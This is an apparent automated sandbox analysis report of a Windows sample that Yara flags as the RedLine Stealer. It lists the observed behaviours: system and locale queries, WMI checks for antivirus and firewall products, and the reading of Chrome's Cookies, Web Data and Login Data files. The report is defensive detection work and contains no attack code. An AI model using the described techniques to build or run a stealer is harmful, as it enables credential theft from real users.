Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_008BA446 cpuid

31_2_008BA446

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: LoadLibraryExA,SetConsoleOutputCP,GetTimeFormatW,GetLocaleInfoW,		31_2_004364A0
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: GetLocaleInfoA,		31_2_004285D0

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\revs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hello_C#.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Contains functionality to query local / system time

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_004011D1 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

31_2_004011D1

Contains functionality to query the account / user name

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_008BA446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

31_2_008BA446

Contains functionality to query windows version

Source: C:\Users\user\AppData\Local\Temp\evs.exe

Code function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

22_2_00403248

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Source: Yara match	File source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected RedLine Stealer

Source: Yara match	File source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE